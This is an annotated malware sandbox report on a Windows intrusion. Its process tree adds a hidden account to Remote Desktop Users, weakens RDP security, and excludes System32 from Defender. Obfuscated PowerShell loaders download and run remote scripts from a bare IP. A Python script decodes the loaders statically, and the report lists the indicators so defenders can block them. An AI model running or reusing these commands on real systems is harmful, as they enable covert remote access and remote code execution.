  C:\Windows\system32\net.exe  PID:4892
    net localgroup "Remote Desktop Users" /add
    - Remote Service Session Hijacking: RDP Hijacking
    - Suspicious use of WriteProcessMemory
    No account name is given, so this is a request to create a local group called "Remote Desktop Users". The built-in group already exists, so the command fails and has no effect; the next command is the one that matters.

    C:\Windows\system32\net1.exe  PID:1872
      C:\Windows\system32\net1 localgroup "Remote Desktop Users" /add
      - Remote Service Session Hijacking: RDP Hijacking

  C:\Windows\system32\net.exe  PID:4060
    net localgroup "Remote Desktop Users" _BootUEFI_ /add
    - Remote Service Session Hijacking: RDP Hijacking
    - Suspicious use of WriteProcessMemory
    Grants the new account the right to log on over RDP. The "RDP Hijacking" tag is a match on the group name; no existing session is hijacked.

    C:\Windows\system32\net1.exe  PID:1460
      C:\Windows\system32\net1 localgroup "Remote Desktop Users" _BootUEFI_ /add
      - Remote Service Session Hijacking: RDP Hijacking

  C:\Windows\system32\net.exe  PID:1724
    net localgroup "Users" _BootUEFI_ /delete
    - Indicator Removal: Network Share Connection Removal
    - Suspicious use of WriteProcessMemory
    Removes the account from the Users group. This is a membership change, not the share-connection removal the tag suggests.

    C:\Windows\system32\net1.exe  PID:2200
      C:\Windows\system32\net1 localgroup "Users" _BootUEFI_ /delete
      - Indicator Removal: Network Share Connection Removal

  C:\Windows\system32\reg.exe  PID:3076
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    Enables Remote Desktop through the policy key, which overrides the Settings-app toggle. No firewall change appears anywhere in the tree, so whether inbound 3389 is actually reachable on a default host depends on what a.ps1 does.

  C:\Windows\system32\reg.exe  PID:2920
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\Client" /v fClientDisableUDP /t REG_DWORD /d 1 /f
    Client-side policy that disables the UDP transport for outbound RDP connections from this host; it does not affect the listener.

  C:\Windows\system32\reg.exe  PID:4332
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v _BootUEFI_ /t REG_DWORD /d 0 /f
    - Hide Artifacts: Hidden Users
    Hides _BootUEFI_ from the logon screen and the User Accounts control panel. It still shows up in net user, Get-LocalUser and the SAM.

  C:\Windows\system32\reg.exe  PID:1028
    reg add "HKCU\SOFTWARE\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride /t REG_DWORD /d 0 /f
    Client-side setting that makes mstsc connect without warning when server authentication fails. Because this runs as SYSTEM, HKCU here is HKEY_USERS\.DEFAULT, not any interactive user's hive.

  C:\Windows\system32\reg.exe  PID:2612
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
    Downgrades the listener to the legacy RDP security layer (0 = RDP, 1 = Negotiate, 2 = TLS), so no TLS is negotiated.

  C:\Windows\system32\reg.exe  PID:4100
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
    Disables Network Level Authentication, so the listener accepts a connection before credentials are checked.

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:1424
    powershell.exe -ep bypass -w hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUwB5AHMAdABlAG0AMwAyACIA
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    Same encoded payload as PID 2240 (Add-MpPreference -ExclusionPath "$env:windir\System32"), now run as SYSTEM with the execution policy bypassed. The "Drops file in System32 directory" and HKEY_USERS signatures on this process are PowerShell's own profile caches and certificate-store keys under the SYSTEM profile.

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:1992
    powershell.exe -command "[string] $a = {(eliasneliaseeliasw-eliasObeliasjeeliasct neeliast.weliasebeliasCleliasient).eliasdeliasoeliaswnleliasoeliasaeliasdSeliastreliasieliasneliasg('eliasheliasteliasteliasp:eliaselias/eliaselias/1elias54.9elias0.6elias2.24elias8/wHk4tMu9XpWA/eliasaelias.eliaspeliaseliasselias1eliaselias')}; $b=$a.replace('elias','');$c=iex $b;iex $c"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    Stage 2 loader, same construction as PID 1920 with the token elias. After .replace('elias','') it reads (New-Object net.webClient).downloadString('http://154.90.62.248/wHk4tMu9XpWA/a.ps1'); the first iex performs the download and the second executes a.ps1. The fetch is plain HTTP to a bare IP, runs as SYSTEM, and is scheduled to repeat every 5 minutes. The 24 flows attributed to this PID under "Blocklisted process makes network request" are the download plus whatever a.ps1 then does; the content of a.ps1 is not shown in this report.
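The two downloader one-liners and the -EncodedCommand payloads in the tree above can be recovered statically. The Python below is an added example, not part of the Triage report or of the malware: it applies the loaders' own .replace() step, joins the string concatenation to obtain the URL, and decodes the UTF-16LE base64 blob, without fetching or executing anything. The three input strings are copied from the process tree; the function names and the returned dictionary layout are this example's own.

```python
"""Static deobfuscation of the PowerShell loaders in this report's process tree.

Added example; not part of the sandbox report or of the malware. The inputs
below are copied from the report's command lines and are only parsed, never
executed or fetched.
"""
import base64
import re

# Stage 1 (PID 1920): the token 'xpr' is spliced into identifiers and literals.
CMD_1920 = r"""&{$ty = 'h5&24g#' + 'UofhxvBcjU' + 'bh#n^_fev4df' + 'hhjwh#dhCz' + 'ghii57r6_fr#tKy' + 'jhr9tfKJry'; [string] $aCmd = {(New-xprObject Nxpretxpr.WebCxprlient).DoxprwnlxproadxprStrxprinxprg('ht' + 'txprps:/' + '/xprpaxprn' + 'axprkexpros' + '.xpricxpru/scxprrxprxpriptxprs/scxpr-xpr' + 'xprintxprermexprdixprxpratexpr.pxprs1xpr')}; $rCmd = $aCmd.replace('xpr', ''); $finalExec = iex $rCmd; iex $finalExec; }"""
# Stage 2 (PID 1992): same construction with the token 'elias'.
CMD_1992 = r"""[string] $a = {(eliasneliaseeliasw-eliasObeliasjeeliasct neeliast.weliasebeliasCleliasient).eliasdeliasoeliaswnleliasoeliasaeliasdSeliastreliasieliasneliasg('eliasheliasteliasteliasp:eliaselias/eliaselias/1elias54.9elias0.6elias2.24elias8/wHk4tMu9XpWA/eliasaelias.eliaspeliaseliasselias1eliaselias')}; $b=$a.replace('elias','');$c=iex $b;iex $c"""
# -EncodedCommand argument shared by PIDs 2240 and 1424.
ENCODED_2240 = ("QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4A"
                "UABhAHQAaAAgACIAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUwB5AHMAdABlAG0AMwAyACIA")


def deobfuscate_loader(command: str) -> dict:
    """Undo the token-splice obfuscation and pull out the download URL."""
    junk = re.search(r"\.replace\('([^']+)',\s*''\)", command)   # the loader names its own token
    block = re.search(r"=\s*\{([^{}]*)\}", command)              # the script block cast to [string]
    if not junk or not block:
        raise ValueError("not the expected .replace()-based loader")
    token = junk.group(1)
    cleaned = block.group(1).replace(token, "")  # exactly what the loader does at runtime
    call = re.search(r"(?i)downloadstring\((.*)\)", cleaned)
    # The URL is built as 'a' + 'b' + ...; joining the literals is enough.
    url = "".join(re.findall(r"'([^']*)'", call.group(1))) if call else None
    return {
        "junk_token": token,
        "cleaned": cleaned,
        "url": url,
        # 2 = one iex to perform the download, one to run what came back
        "iex_count": len(re.findall(r"\biex\b", command)),
    }


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE, not UTF-8."""
    return base64.b64decode(blob).decode("utf-16-le")


if __name__ == "__main__":
    for name, cmd in (("PID 1920", CMD_1920), ("PID 1992", CMD_1992)):
        info = deobfuscate_loader(cmd)
        print(f"{name}: token={info['junk_token']!r} iex={info['iex_count']} url={info['url']}")
    print("PID 2240/1424:", decode_encoded_command(ENCODED_2240))
```

Run as a script it prints the two URLs and the decoded Add-MpPreference command. The URL and the IP are live indicators from this sample, not fixtures: block them, do not browse to them.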
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1): PowerShell
- Scheduled Task/Job (1): Scheduled Task
Privilege Escalation
- Account Manipulation (1)
- Scheduled Task/Job (1): Scheduled Task
Defense Evasion
- Hide Artifacts (1): Hidden Users
- Indicator Removal (1): Network Share Connection Removal
- Modify Registry (1)
Downloads
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 4KB

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB